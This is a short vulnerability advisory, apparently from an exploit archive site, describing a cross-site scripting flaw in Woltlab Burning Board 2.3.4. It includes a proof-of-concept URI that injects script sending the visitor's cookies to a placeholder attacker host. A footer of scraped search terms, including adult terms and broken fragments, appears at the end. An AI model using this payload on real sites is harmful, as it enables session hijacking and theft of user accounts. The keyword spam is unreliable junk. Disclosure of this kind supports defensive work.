about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Woltlab Burning Board Class_DB_MySQL.PHP Cross-Site Scripting Vulnerability


Title Woltlab Burning Board Class_DB_MySQL.PHP Cross-Site Scripting Vulnerability
Published 2006-03-18-12:00AM
Updated 2006-03-18-12:00AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  r57shell@gmail.com is credited with the discovery of this vulnerability.
Vulnerable  Woltlab Burning Board 2.3.4
Not Vulnerable  
Code   This issue can be exploited using a web client.

The following proof of concept URI is available:

http://www.example.com/filebase_redirect.php?fid='<script>location.href='http://yoursite.com/xss.php?cook='+escape(document.cookie)</script>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 04 Dec 2008 20:46:58 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Zohrehsex 45678dj.cn rs gallery rs gallery rs+gallery rs gallery wordsex] X x x porn /plugins/p blok KARENA KAP phpnuke sq Sex videos kaming out www.google Tamil acto Www.simran Group sex Fuckvideo news for c filmsex tv ip board 2 all cartoo Hot+Sexye+ albom akse www.jmmyxt nangi aish components sex chanal Britneychi CMS is Fre parayasex www.wapatr nangi aish rs gallery vidioe sex nude image shop335089 polat5200 NEWSolved %20XHTMLSu Xxx pics WU-FTPD sasuske pi CMS is Fre mambo Remo dim Worldsex.c shop+car sexir sami